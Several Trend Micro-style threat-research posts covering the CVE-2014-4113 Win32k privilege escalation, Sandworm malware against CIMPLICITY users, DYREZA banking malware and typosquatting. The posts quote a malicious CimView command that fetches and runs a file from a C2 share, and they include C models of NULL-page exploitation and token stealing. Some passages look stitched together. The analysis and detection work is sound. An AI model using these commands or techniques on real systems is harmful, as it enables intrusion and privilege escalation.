
    Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in its October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, lets an attacker run code on a victim's machine through a specially crafted Office document, which makes delivering a malware payload straightforward.

    This vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target SCADA systems.

    The other two vulnerabilities (CVE-2014-4148, CVE-2014-4113) are in the Windows kernel-mode driver Win32k.sys and affect most Windows versions. In 2013, only one Windows kernel zero-day was made public, and it affected only some versions of Windows XP and Windows Server 2003. These new zero-days could be a sign that attackers are shifting their focus back to kernel vulnerabilities.

    CVE-2014-4113 allows elevation of privilege (EoP) when exploited successfully. Microsoft addressed it in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not work on Windows 8 and later versions.

    Given a program path as a command-line parameter, the exploit launches that program as a new process running with SYSTEM privileges. EoP exploits are typically paired with another exploit in targeted attacks: the application compromised first (a browser or document reader, for example) does not have the privileges the attackers need. Stuxnet did exactly this, using CVE-2010-2743 (also in Win32k.sys) to elevate privileges after it had infected the system through other exploits.

    The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes:

    • 70857e02d60c66e27a173f8f292774f1
    • f9f01ce747679b82723b989d01c4d927

    We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems.

    Everything you need to know about the Win32k.sys vulnerability

    Win32k.sys is the kernel-mode side of the Windows GUI subsystem: it implements window management and is used by every GUI process and thread. Its user-mode counterparts are user32.dll and GDI32.dll. Because of its complex interaction with user-mode applications, Win32k.sys has a long history of vulnerabilities.

    Let's take a closer look at the vulnerability being exploited. The root cause is a function return value that is not validated before it is used. Programmers tend to overlook this, but skipping the check is a serious security risk.

    In Win32k.sys there is a function called xxxMNFindWindowFromPoint(), which returns either the address of a win32k!tagWND structure or one of the error codes -1 and -5. Another function, xxxHandleMenuMessages(), calls it and passes the return value straight to xxxSendMessage(). Below is the pseudo code:

    tagWND* pWnd = xxxMNFindWindowFromPoint(…);
    …   // no check that pWnd is a real address rather than -1 or -5
    xxxSendMessage(pWnd, …);

    If the error code -1 or -5 is used by xxxSendMessage() as an address, the result is an invalid memory access in kernel mode and, ordinarily, a blue screen. Triggering the error on its own therefore only crashes the machine; the next section shows how the sample turns the bad pointer into kernel-mode code execution.

    The key steps of the exploit are:

    • Map a prepared memory section at the NULL page. It contains a fake win32k!tagWND structure whose function-pointer field points to the EoP shell code.
    • Trigger the bug so that the return value (pWnd) of xxxMNFindWindowFromPoint() is -5 (0xfffffffb). Since -5 sits at the very top of the address space, pWnd plus the small offset of each field wraps around to an address inside the NULL page, where the fake structure lives. Every field xxxSendMessage() checks is readable and holds a sensible value, so the function treats -5 as a valid window and calls the function pointer in the structure, which is the pointer to the shell code.
    • In the shell code, replace the token in the current process's EPROCESS with the SYSTEM token to elevate to SYSTEM privileges.
    • Create a child process running the assigned program, now with SYSTEM privileges.
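    To make the unchecked return value and the NULL-page trick concrete, here is a small C model added to this post; it is not code from the sample or from Win32k.sys. It models the two error codes, the 32-bit wraparound that turns -5 plus a field offset into an address inside page 0, a user-mapped page 0 as a byte array, and the unchecked versus checked use of the return value. The field offset OFF_PFNWNDPROC (0x60) is an assumed, illustrative value, not the real tagWND layout.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Error codes xxxMNFindWindowFromPoint() returns in place of a tagWND pointer. */
#define WND_ERR_NOT_FOUND 0xffffffffu   /* -1 */
#define WND_ERR_NO_HIT    0xfffffffbu   /* -5 */
#define PAGE_SZ           0x1000u

/* Assumed, illustrative offset of the function-pointer field that is read
   from the window structure. The real tagWND layout is build-specific. */
#define OFF_PFNWNDPROC    0x60u

/* Stand-in for the page the exploit maps at address 0 (step 1 above). */
static uint8_t null_page[PAGE_SZ];

static bool is_wnd_error(uint32_t pwnd) {
    return pwnd == WND_ERR_NOT_FOUND || pwnd == WND_ERR_NO_HIT;
}

/* 32-bit pointer arithmetic is modulo 2^32: a base at the top of the address
   space plus a small field offset wraps around into page 0. */
static uint32_t field_address(uint32_t pwnd, uint32_t off) {
    return pwnd + off;
}

/* True if [addr, addr+width) lies entirely inside page 0. */
static bool in_null_page(uint32_t addr, uint32_t width) {
    return addr < PAGE_SZ && width <= PAGE_SZ - addr;
}

/* Attacker side: write a fake window-procedure pointer where the wrapped
   read will land. Returns the address written, or UINT32_MAX if it would
   not fall inside page 0. */
static uint32_t plant_fake_wndproc(uint32_t off, uint32_t shellcode_va) {
    uint32_t a = field_address(WND_ERR_NO_HIT, off);
    if (!in_null_page(a, sizeof shellcode_va)) return UINT32_MAX;
    memcpy(null_page + a, &shellcode_va, sizeof shellcode_va);
    return a;
}

/* Unchecked use, modelled: the return value is treated as a pointer and the
   function pointer is read out of it. Reads that do not land in page 0 return
   0 here; the real kernel would fault on them. */
static uint32_t wndproc_unchecked(uint32_t pwnd, uint32_t off) {
    uint32_t a = field_address(pwnd, off), v = 0;
    if (in_null_page(a, sizeof v)) memcpy(&v, null_page + a, sizeof v);
    return v;
}

/* Checked use: the missing validation, rejecting the error codes before the
   value is ever treated as a pointer. */
static uint32_t wndproc_checked(uint32_t pwnd, uint32_t off) {
    if (is_wnd_error(pwnd)) return 0;
    return wndproc_unchecked(pwnd, off);
}
```

    With the assumed offset, 0xfffffffb + 0x60 wraps to 0x5b, so the kernel's read of the "window procedure" lands 0x5b bytes into the attacker's page. On 64-bit Windows -5 sign-extends to 0xfffffffffffffffb and the same wrap occurs, which is why the 64-bit sample can use the same approach.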

    The sample uses SetWindowsHookEx() to force xxxMNFindWindowFromPoint() to return -5:

    1. Create a window and a two-level popup menu.
    2. Hook that window's window procedure (wndproc) calls.
    3. Track the popup menu on the window, which enters the hook callback.
    4. In the hook callback, change the menu's wndproc to another callback.
    5. In the menu's callback, destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX).
    6. With the menu destroyed, xxxMNFindWindowFromPoint() returns -5.

    The shell code of the sample is simple and direct, as the snippet below shows. It locates the EPROCESS of the SYSTEM process (PID 4) and copies that process's token into the EPROCESS of the current process.


    Figure 1. Code snippet of the sample
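    The following C model, added here and not taken from the sample, shows the algorithm the token-stealing shell code implements: walk the kernel's circular ActiveProcessLinks list from the current process until PID 4 is found, then copy its Token field. The EPROCESS layout below is an illustrative subset under the public symbol names; real offsets are build-specific, and real shell code obtains the current EPROCESS from the KPCR/KTHREAD rather than as an argument. The PIDs and token values are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Illustrative subset of EPROCESS: only the members the shell code needs. */
typedef struct list_entry { struct list_entry *flink, *blink; } LIST_ENTRY;
typedef struct eprocess {
    uint64_t   unique_process_id;    /* EPROCESS.UniqueProcessId */
    LIST_ENTRY active_process_links; /* EPROCESS.ActiveProcessLinks, circular */
    uint64_t   token;                /* EPROCESS.Token (an EX_FAST_REF) */
} EPROCESS;

#define SYSTEM_PID 4u
#define CONTAINING_RECORD(p, type, member) \
    ((type *)((char *)(p) - offsetof(type, member)))

/* Walk ActiveProcessLinks from the current process until the PID matches;
   the list is circular, so stop when we are back where we started. */
static EPROCESS *find_process(EPROCESS *cur, uint64_t pid) {
    EPROCESS *p = cur;
    do {
        if (p->unique_process_id == pid) return p;
        p = CONTAINING_RECORD(p->active_process_links.flink,
                              EPROCESS, active_process_links);
    } while (p != cur);
    return NULL;
}

/* The token steal: copy System's token value into the current process.
   The sample copies the raw EX_FAST_REF, reference-count bits included. */
static int steal_system_token(EPROCESS *cur) {
    EPROCESS *sys = find_process(cur, SYSTEM_PID);
    if (sys == NULL || sys == cur) return 0;
    cur->token = sys->token;
    return 1;
}

/* Constructed fixture: link n processes into a circular list. */
static void link_processes(EPROCESS *procs, size_t n) {
    for (size_t i = 0; i < n; i++) {
        procs[i].active_process_links.flink = &procs[(i + 1) % n].active_process_links;
        procs[i].active_process_links.blink = &procs[(i + n - 1) % n].active_process_links;
    }
}

/* Demo: three constructed processes; the exploit runs as PID 1234 and we
   return its token after the steal (expected: System's value). */
static uint64_t demo_token_after_steal(void) {
    EPROCESS procs[3];
    memset(procs, 0, sizeof procs);
    procs[0].unique_process_id = SYSTEM_PID; procs[0].token = 0xffff8a00d2f0c061ull;
    procs[1].unique_process_id = 812;        procs[1].token = 0xffff8a00d3000dc5ull;
    procs[2].unique_process_id = 1234;       procs[2].token = 0xffff8a00d4110c22ull;
    link_processes(procs, 3);
    steal_system_token(&procs[2]);
    return procs[2].token;
}

/* Demo: no PID 4 on the list, so nothing is changed and 0 is returned. */
static int demo_no_system_process(void) {
    EPROCESS procs[2];
    memset(procs, 0, sizeof procs);
    procs[0].unique_process_id = 812;
    procs[1].unique_process_id = 1234;
    link_processes(procs, 2);
    return steal_system_token(&procs[1]);
}
```

    Because the walk only compares PIDs and copies one field, the shell code needs no kernel imports and fits in a few dozen bytes, which is why it can sit in the exploit's own user-mode memory on systems without SMEP.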

    From the analysis, we can see that these kernel vulnerabilities are easier to exploit than, say, Internet Explorer use-after-free vulnerabilities. Protections that are effective in user mode, like DEP, are sidestepped by kernel-mode exploits of this kind: the attacker's code is an ordinary program rather than data or script injected into another process, so the shell code already sits in executable memory.

    With more application sandboxing adopted in the OS, kernel vulnerabilities will become more important for privilege elevation. Though this exploitation method is not new, it will draw attackers' attention, especially now that CVE-2014-4113 is public.

    During our sample sourcing, we even saw that the source code of an exploit creation tool had been exposed, so more exploit variants can be expected. Threat actors need kernel vulnerabilities to carry out EoP attacks and break out of application sandboxes. As information about these exploitation methods spreads, we may see more similar kernel zero-day vulnerabilities in the future.

    Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date.

    Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on them. One reason is Supervisor Mode Execution Prevention (SMEP), a CPU feature (present on Intel processors since Ivy Bridge) that Windows 8 enables: it prevents code on user-mode pages from being executed while the processor runs in kernel mode. The fake tagWND and the shell code both live in user-mode memory, so the call into the shell code faults and the machine crashes instead of elevating privileges. Windows 8 also refuses to let a user process map the NULL page, which removes the exploit's first step altogether.

    Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles:


    On October 14th, a report was publicly released regarding the Sandworm team. After beginning an investigation into the affiliated malware samples and domains, we quickly realized that this group is very likely targeting SCADA-centric victims who use GE Intelligent Platforms' CIMPLICITY HMI solution suite. We have observed this team using .cim and .bcl files as attack vectors; both file types belong to the CIMPLICITY software. As further evidence that the malware targets CIMPLICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.

    Figure 1. Strings showing environment variable

    CIMPLICITY is an application suite that is used in conjunction with SCADA systems.  A key component of any SCADA system is the HMI. The HMI (which stands for Human-Machine interface) can be viewed as an operator console that is used to monitor and control devices in an industrial environment. These devices can be responsible for automation control as well as safety operations.

    Figure 2 below shows an example of where HMIs can be found in an electric power delivery system. Additionally, you may find HMIs in the corporate network that are being used for design, development, and testing.

    Figure 2. Sample SCADA System

    It is important to note that we are currently seeing CIMPLICITY being used as an attack vector; however, we have found no indication that this malware is manipulating any actual SCADA systems or data. Since HMIs are located in both the corporate and control networks, this attack could be used to target either network segment, or used to cross from the corporate to the control network.

    What Drew Our Attention?

    When looking closer at the recent Sandworm Team report, we started to pivot off several of the C2’s that were identified in the report. Again, we aren’t aware of any attacks against SCADA devices directly utilizing anything that we discuss below.

    One of the C2s that drew our immediate attention was 94[.]185[.]85[.]122. Pivoting off this C2, we located a file called config.bak (MD5: c931be9cd2c0bd896ebe98c9304fea9e). This file piqued our interest right away because it is a CimEdit/CimView file, an object-oriented file format used by GE's CIMPLICITY SCADA software suite to administer SCADA devices.

    Figure 3. CimView/CimEdit Example

    In config.bak, there are two events that are defined: OnOpenExecCommand and ScreenOpenDispatch.

    The handler of OnOpenExecCommand is the following command line:

    cmd.exe /c "copy \\94[.]185[.]85[.]122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH%\CimCMSafegs.exe"

    It is important to note that the variable %CIMPATH% is used as the drop location for default.txt; this is a standard variable that CIMPLICITY sets for its installs. The handler of ScreenOpenDispatch is the subroutine start(), which downloads the file from hxxp://94[.]185[.]85[.]122/newsfeed.xml, saves it and executes it with cscript.exe, deletes the file after execution, and terminates the current process.

    We currently do not have a sample of newsfeed.xml or {random 41 character hex string}.wsf that can be analyzed for further detail. This event mechanism does not seem to exploit vulnerabilities; it’s comparable to AutoOpen and AutoExec in Microsoft Office.

    In addition to config.bak being a CimEdit/CimView file, there is a reference to devlist.cim (MD5: 59e41a4cdf2a7d37ac343d0293c616b7), which is a Cimpack Design Drawing File.

    The default.txt file copied from the C2 in the above command structure drops and executes %Startup%\flashplayerapp.exe, then deletes itself after execution. Flashplayerapp.exe is capable of issuing the following commands:

    • exec
    • lexec
    • die
    • getup
    • turnoff
    • chprt

    In addition to config.bak and default.txt, another file, shell.bcl (MD5: bdc7fafc26bee0e5e75b521a89b2746d), drew our attention. It is a script designed to run in the Basic Control Engine; in CIMPLICITY, .bcl files are used to write scripts that automate functions, and such scripts are used heavily throughout SCADA systems. shell.bcl executes \\94[.]185[.]85[.]122\public\xv.exe directly from the share.

    Based on the strings in shell.bcl, xv.exe is supposed to exploit the system vulnerability. We don’t currently have a copy or hash for xv.exe or Flashplayerapp.exe available to confirm this assumption.

    Open Directories

    During the course of regular threat intelligence gathering, we often look closely at the C2 server that attackers are using to communicate and drop/upload files to and from victim machines.

    In the case of 94[.]185[.]85[.]122, in addition to config.bak, we were able to pull down additional malware files that the particular actors were using from the C2. A few of the notable files found on the C2 can be found below. These files may or may not have been used in conjunction with attacks involving SCADA devices.

    Spiskideputatovdone.ppsx (MD5: 330e8d23ab82e8a0ca6d166755408eb1), whose name means "list of deputies" in Russian, has been tied to an email address based on VirusTotal submissions. This PPSX file downloads and loads 94[.]185[.]85[.]122\public\slide1.gif and 94[.]185[.]85[.]122\public\slides.inf (MD5: 8313034e9ab391df83f6a4f242ec5f8d). The downloaded .inf file renames the local file slide1.gif to slide1.gif.exe and adds the registry entry HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce Install="{dir}\slide1.gif.exe", so the renamed file runs at the next logon. Oleh Tiahnybok is a Ukrainian politician with outspoken anti-Russian views.

    Slide1.gif.exe (MD5: 8a7c30a7a105bd62ee71214d268865e3) drops FONTCACHE.DAT  (MD5: 2f6582797bbc34e4df47ac25e363571d) and deletes itself after execution. FONTCACHE.DAT is a version of the Black Energy bot capable of executing the following commands on the system:

    • delete
    • ldplg
    • unlplg
    • update
    • dexec
    • exec
    • updcfg
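    As an added example, not code from this post or from GE, here is a small C matcher for the two behaviours described above: a command line that copies a file from a UNC share into %CIMPATH% and starts it (the OnOpenExecCommand handler), or that runs an executable straight off the share (shell.bcl), and a RunOnce value pointing at a double-extension file such as slide1.gif.exe. The sample command lines are constructed from the strings quoted in this post; the benign CimView path and file-server line are assumed.

```c
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

/* Case-insensitive substring search (strcasestr is not portable). */
static const char *find_ci(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n) return hay;
    }
    return NULL;
}

enum {
    CIM_UNC_SOURCE    = 1,  /* something is read from \\host\share          */
    CIM_CIMPATH_DEST  = 2,  /* %CIMPATH% appears as a drop location          */
    CIM_CHAINED_START = 4,  /* copy ... && start ...                         */
    CIM_REMOTE_EXEC   = 8   /* an .exe is run straight from the share        */
};

/* True if the token that starts at the UNC path ends in ".exe". */
static bool unc_token_is_exe(const char *unc) {
    size_t n = 0;
    while (unc[n] && !isspace((unsigned char)unc[n]) && unc[n] != '"') n++;
    return n >= 4 && find_ci(unc + n - 4, ".exe") == unc + n - 4;
}

static int cim_command_flags(const char *cmd) {
    int f = 0;
    const char *unc = strstr(cmd, "\\\\");
    if (unc) f |= CIM_UNC_SOURCE;
    if (find_ci(cmd, "%CIMPATH%")) f |= CIM_CIMPATH_DEST;
    if (find_ci(cmd, "&& start")) f |= CIM_CHAINED_START;
    if (unc && unc_token_is_exe(unc)) f |= CIM_REMOTE_EXEC;
    return f;
}

/* A UNC source alone is normal on a plant network; flag it only when it is
   combined with a CIMPATH drop, a chained start, or direct execution. */
static bool cim_command_suspicious(const char *cmd) {
    int f = cim_command_flags(cmd);
    return (f & CIM_UNC_SOURCE) &&
           (f & (CIM_CIMPATH_DEST | CIM_CHAINED_START | CIM_REMOTE_EXEC));
}

/* RunOnce value pointing at a double-extension executable (slide1.gif.exe). */
static bool runonce_double_extension(const char *value) {
    char buf[260];
    if (*value == '"') value++;
    size_t n = strlen(value);
    if (n >= sizeof buf) return false;
    memcpy(buf, value, n + 1);
    if (n && buf[n - 1] == '"') buf[--n] = '\0';
    if (n < 4 || find_ci(buf + n - 4, ".exe") != buf + n - 4) return false;
    const char *base = strrchr(buf, '\\');
    base = base ? base + 1 : buf;
    const char *first_dot = strchr(base, '.');
    return first_dot != NULL && first_dot < buf + n - 4;
}

/* Constructed samples: the two command lines from this post plus two benign ones. */
static int demo_suspicious_count(void) {
    static const char *samples[] = {
        "cmd.exe /c copy \\\\94[.]185[.]85[.]122\\public\\default.txt "
        "\"%CIMPATH%\\CimCMSafegs.exe\" && start \"WOW64\" \"%CIMPATH%\\CimCMSafegs.exe\"",
        "\\\\94[.]185[.]85[.]122\\public\\xv.exe",
        "\"C:\\Program Files\\Proficy\\CIMPLICITY\\CimView.exe\" C:\\screens\\overview.cim",
        "copy \\\\fileserver\\screens\\overview.cim C:\\screens\\",
    };
    int hits = 0;
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        if (cim_command_suspicious(samples[i])) hits++;
    return hits;
}
```

    Feed it the command lines of processes spawned by CimView.exe or CimEdit.exe (from process-creation auditing) and the values written under RunOnce; the benign screen-loading and file-copy lines in the fixture are not flagged, the two from this post are.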


    As we have seen, these are pieces of a very complex targeted attack that is seemingly focused on GE Intelligent Platform CIMPLICITY users.  We have, at present, found no indications that this malware is actually manipulating physical SCADA systems or their resultant data.

    As we continue the investigation into this targeted attack, be sure to check back as we will keep you up to date on our findings. All of the samples listed in this blog post are currently detected by Trend Micro as BKDR_BLACKEN.A and BKDR_BLACKEN.B.

    Special thanks to the entire Forward-Looking Threat Research Team, Christopher Daniel So, Mark Joseph Manahan and the Ottawa Deep Security Labs

    Update as of October 17, 2014, 12:35 A.M.

    An earlier version of this post included several incorrect hashes. These have now been corrected.


    Cybercriminals and threat actors often use tried-and-tested vulnerabilities in order to infect user systems and consequently, penetrate an enterprise network. This highlights the importance of patching systems and keeping software and applications up-to-date.

    We recently spotted DYREZA malware leveraging an old vulnerability in Adobe Reader and Acrobat, CVE-2013-2729, an integer overflow that Adobe patched in May 2013. Successful exploitation leads to the execution of arbitrary code on the affected system.



    Figures 1-2. Screenshots of spam emails

    DYREZA malware uses spammed message that purports to be an invoice notification as its infection vector. It has a malicious .PDF file attachment, detected by Trend Micro as TROJ_PIDIEF.YYJU. When executed, it exploits the CVE-2013-2729 vulnerability, which leads to the download of TSPY_DYRE.EKW, a variant of DYREZA (also known as DYRE and DYRANGES).

    DYREZA is a malware known for stealing banking credentials and associated with parcel mule scams. We recently wrote a blog post detailing the role that this malware plays in the threat landscape ecosystem and some of its notable behavior, including its capability to perform man-in-the-middle (MITM) attacks via browser injections, monitoring online banking sessions of targeted banks, and stealing other information such as browser versions, snapshots, and personal certificates.

    Users and enterprises are at risk since DYREZA can get other types of data such as personal identifiable information (PII) and credentials via browser snapshots. Aside from this, we also reported that the CUTWAIL botnet leads to the download of both UPATRE and DYRE malware.

    What makes TSPY_DYRE.EKW notable is its ability to steal crucial information via injecting malicious codes onto certain banking and bitcoin login webpages.  Some of the bitcoin pages it monitors are:


    Apart from its information-stealing routines, TSPY_DYRE.EKW can connect to certain malicious websites to send and receive information. It can also query specific STUN (Session Traversal Utilities for NAT) servers to learn the public IP address of the compromised computer: a STUN server simply reports back the source address and port it saw the request arrive from, so the malware needs no privileges and no special traffic to discover its external address. This lets the cybercriminals locate the infected machine and possibly determine the affected users' and organizations' locations. The top victim countries are Ireland, the United States, Canada, Great Britain, and the Netherlands.
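    The STUN exchange described above, as an added example in C that is not code from the malware or from this post: the client builds an RFC 5389 Binding Request, the server answers with an XOR-MAPPED-ADDRESS attribute, and the client undoes the XOR with the magic cookie to recover its public address and port. Both messages are constructed in memory here so the example runs offline; the transaction ID and the address 192.0.2.1:49152 are constructed test values.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define STUN_MAGIC        0x2112A442u
#define STUN_BINDING_REQ  0x0001
#define STUN_BINDING_RESP 0x0101
#define ATTR_XOR_MAPPED   0x0020

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t get32(const uint8_t *p) { return ((uint32_t)get16(p) << 16) | get16(p + 2); }

/* Client side: a 20-byte Binding Request with no attributes. */
static size_t stun_build_request(uint8_t out[20], const uint8_t txid[12]) {
    put16(out, STUN_BINDING_REQ);
    put16(out + 2, 0);
    put32(out + 4, STUN_MAGIC);
    memcpy(out + 8, txid, 12);
    return 20;
}

/* Server side: Binding Response carrying one XOR-MAPPED-ADDRESS (IPv4). */
static size_t stun_build_response(uint8_t *out, const uint8_t txid[12],
                                  uint32_t ip, uint16_t port) {
    put16(out, STUN_BINDING_RESP);
    put16(out + 2, 12);                         /* attribute header + 8-byte value */
    put32(out + 4, STUN_MAGIC);
    memcpy(out + 8, txid, 12);
    put16(out + 20, ATTR_XOR_MAPPED);
    put16(out + 22, 8);
    out[24] = 0; out[25] = 0x01;                /* family: IPv4 */
    put16(out + 26, (uint16_t)(port ^ (STUN_MAGIC >> 16)));
    put32(out + 28, ip ^ STUN_MAGIC);
    return 32;
}

/* Client side again: check header and transaction ID, walk the attributes,
   and undo the XOR on the mapped address. */
static bool stun_parse_response(const uint8_t *buf, size_t len, const uint8_t txid[12],
                                uint32_t *ip, uint16_t *port) {
    if (len < 20 || get16(buf) != STUN_BINDING_RESP || get32(buf + 4) != STUN_MAGIC) return false;
    if (memcmp(buf + 8, txid, 12) != 0) return false;
    size_t body = get16(buf + 2);
    if (body > len - 20) return false;
    for (size_t off = 20; off + 4 <= 20 + body; ) {
        uint16_t type = get16(buf + off), alen = get16(buf + off + 2);
        if (off + 4 + alen > 20 + body) return false;
        if (type == ATTR_XOR_MAPPED && alen == 8 && buf[off + 5] == 0x01) {
            *port = (uint16_t)(get16(buf + off + 6) ^ (STUN_MAGIC >> 16));
            *ip = get32(buf + off + 8) ^ STUN_MAGIC;
            return true;
        }
        off += 4 + ((alen + 3u) & ~3u);         /* attributes are 4-byte aligned */
    }
    return false;
}

/* End-to-end demo: returns the public IPv4 recovered from the constructed exchange. */
static uint32_t demo_public_ip(void) {
    static const uint8_t txid[12] = {1,2,3,4,5,6,7,8,9,10,11,12};
    uint8_t req[20], resp[64];
    uint32_t ip = 0; uint16_t port = 0;
    stun_build_request(req, txid);
    if (get32(req + 4) != STUN_MAGIC) return 0;
    size_t n = stun_build_response(resp, txid, 0xC0000201u, 49152); /* 192.0.2.1:49152 */
    return stun_parse_response(resp, n, txid, &ip, &port) && port == 49152 ? ip : 0;
}

/* A response for a different transaction must be rejected. */
static bool demo_reject_wrong_txid(void) {
    static const uint8_t txid[12]  = {1,2,3,4,5,6,7,8,9,10,11,12};
    static const uint8_t other[12] = {9,9,9,9,9,9,9,9,9,9,9,9};
    uint8_t resp[64];
    uint32_t ip; uint16_t port;
    size_t n = stun_build_response(resp, other, 0xC0000201u, 49152);
    return stun_parse_response(resp, n, txid, &ip, &port);
}
```

    For defenders, the useful part is the wire shape: a 20-byte UDP datagram starting with 00 01 and the cookie 21 12 A4 42, sent from a host that has no VoIP or WebRTC reason to do so, is a cheap network indicator for this behaviour.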

    Bitcoin is a digital currency with real-world value, and cybercriminals go after it because it offers them a new way to generate profit. This is not the first time scammers and cybercriminals have targeted bitcoins, but the attack shows how traditional threats like exploits and banking malware remain a relevant means of stealing user credentials while also hitting a relatively new platform. It also reinforces the lesson about keeping systems and software applications updated to their latest versions.

    Trend Micro protects users from this threat via its Smart Protection Network that detects the spammed message and all related malware.

    With additional analysis from Rhena Inocencio, Karla Agregada, and Michael Casayuran


    A new spam attack disguised as invoice message notifications was recently seen spreading the UPATRE malware, which ultimately downloads its final payload: a BANKER malware related to the DYREZA/DYRE banking malware.


    In early October we observed a surge of spammed messages sent by the botnet CUTWAIL/PUSHDO, totaling to more than 18,000 messages seen in a single day. CUTWAIL/PUSHDO has been in the wild since as early as 2007 and was considered one of the biggest spam botnets in 2009.

    We spotted spammed emails that disguise themselves as invoice notifications or "new alert messages" from various companies and institutions.

    Figure 1. Screenshots of spammed messages related to CUTWAIL/PUSHDO



    The Domain Name System (DNS) plays a vital role in the operation of the Internet. Over the years it has been a primary target for malicious users looking for weaknesses in its protocol, its infrastructure, and the way people use it. Examples include cache poisoning attacks, vulnerable DNS server implementations, and abuse of ordinary user mistakes.

    Taking advantage of users’ spelling mistakes

    Misspelling a domain name in the browser's address bar is a common user mistake, and attackers were quick to take advantage of it. They register the misspelled ("typosquatting") versions of victim domains in order to capture the traffic those slips produce, and then use the domains in a wide range of unethical and illegal ways, including harvesting user credentials through phishing.
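    The generation side of typosquatting, as an added C example that is not part of this post: for one DNS label it enumerates the three commonest slips (a dropped character, two adjacent characters swapped, a doubled character) and de-duplicates the result. Defenders run the same enumeration over their own brand to decide what to register defensively or watch in new-registration feeds; "trend" and "aa" below are constructed inputs.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define MAX_LABEL    63      /* DNS label length limit */
#define MAX_VARIANTS 512

typedef struct {
    char   v[MAX_VARIANTS][MAX_LABEL + 2];
    size_t n;
} variants_t;

/* Append s unless it equals the original label or is already listed. */
static bool add_unique(variants_t *out, const char *s, const char *original) {
    if (strcmp(s, original) == 0 || out->n >= MAX_VARIANTS) return false;
    for (size_t i = 0; i < out->n; i++)
        if (strcmp(out->v[i], s) == 0) return false;
    strcpy(out->v[out->n++], s);
    return true;
}

/* Omission, transposition and doubled-character variants of one label.
   Returns how many distinct variants were produced. */
static size_t typo_variants(const char *label, variants_t *out) {
    size_t len = strlen(label);
    char buf[MAX_LABEL + 2];
    out->n = 0;
    if (len == 0 || len > MAX_LABEL) return 0;
    for (size_t i = 0; i < len; i++) {               /* omission: trend -> tred */
        memcpy(buf, label, i);
        memcpy(buf + i, label + i + 1, len - i);     /* includes the terminator */
        add_unique(out, buf, label);
    }
    for (size_t i = 0; i + 1 < len; i++) {           /* transposition: trend -> tredn */
        memcpy(buf, label, len + 1);
        buf[i] = label[i + 1];
        buf[i + 1] = label[i];
        add_unique(out, buf, label);
    }
    for (size_t i = 0; i < len; i++) {               /* doubling: trend -> trennd */
        memcpy(buf, label, i + 1);
        memcpy(buf + i + 1, label + i, len - i + 1); /* includes the terminator */
        add_unique(out, buf, label);
    }
    return out->n;
}

static bool is_listed(const variants_t *v, const char *s) {
    for (size_t i = 0; i < v->n; i++)
        if (strcmp(v->v[i], s) == 0) return true;
    return false;
}

/* Convenience wrappers for a single label. */
static size_t variant_count(const char *label) {
    static variants_t v;
    return typo_variants(label, &v);
}

static bool is_typo_variant(const char *label, const char *candidate) {
    static variants_t v;
    typo_variants(label, &v);
    return is_listed(&v, candidate);
}
```

    For a five-character label this yields 14 candidates; pair each with the TLDs the organisation uses and resolve them periodically, since a candidate that suddenly starts resolving is the signal worth alerting on.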



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice